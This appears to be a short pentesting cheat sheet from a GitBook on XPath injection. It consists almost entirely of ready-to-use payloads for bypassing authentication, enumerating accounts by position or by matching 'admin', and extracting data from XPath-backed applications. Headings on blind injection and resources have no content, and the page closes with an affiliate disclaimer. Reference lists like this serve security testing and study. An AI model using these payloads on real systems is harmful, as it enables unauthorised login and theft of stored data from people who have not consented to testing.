XPath Injection

Authentication Bypass

'or true() or '
# Finding an interesting account

 # Small DB - position() - increment the id

' or position()=1 '

# Large DB - contains() string

' or contains(., 'admin') or '

Data extraction

knownParameter' or '1'='1

random| // text()

Blind XPAth Injection

Resources

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Last updated